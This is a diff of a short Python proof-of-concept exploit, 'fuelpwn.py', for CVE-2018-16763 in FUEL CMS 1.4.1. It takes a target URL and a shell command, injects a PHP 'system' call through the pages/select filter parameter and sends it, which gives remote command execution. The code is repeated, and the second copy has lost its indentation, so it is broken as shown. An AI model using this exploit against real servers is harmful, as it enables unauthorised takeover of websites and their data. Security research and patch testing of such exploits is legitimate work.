wulfgarpro · September 29, 2020 08:30
diff --git a/fuelpwn.py b/fuelpwn.py
 """
 FUEL CMS v1.4.1 CVE-2018-16763 PoC.

 This PoC was derived from: https://www.exploit-db.com/exploits/47138.
 """
 import argparse
 import urllib
 import requests

 parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')

 parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1')
 parser.add_argument('cmd', type=str, help='Command to execute')
 args = parser.parse_args()

 url=args.url
 cmd=args.cmd

 payload="'+pi(print($a='system'))+$a('"+cmd+"')+'"
 payload_enc=urllib.quote(payload)  # URL encoded payload
 filter_path='/fuel/pages/select/?filter='+payload_enc

 try:
    _ = requests.get(url+filter_path)
 except:
    pass
	"""
	FUEL CMS v1.4.1 CVE-2018-16763 PoC.

	This PoC was derived from: https://www.exploit-db.com/exploits/47138.
	"""
	import argparse
	import urllib
	import requests

	parser = argparse.ArgumentParser('Fuel CMS v1.4 CVE-2018-16763 PoC')

	parser.add_argument('url', type=str, help='URL to target, e.g. http://127.0.0.1')
	parser.add_argument('cmd', type=str, help='Command to execute')
	args = parser.parse_args()

	url=args.url
	cmd=args.cmd

	payload="'+pi(print($a='system'))+$a('"+cmd+"')+'"
	payload_enc=urllib.quote(payload) # URL encoded payload
	filter_path='/fuel/pages/select/?filter='+payload_enc

	try:
	_ = requests.get(url+filter_path)
	except:
	pass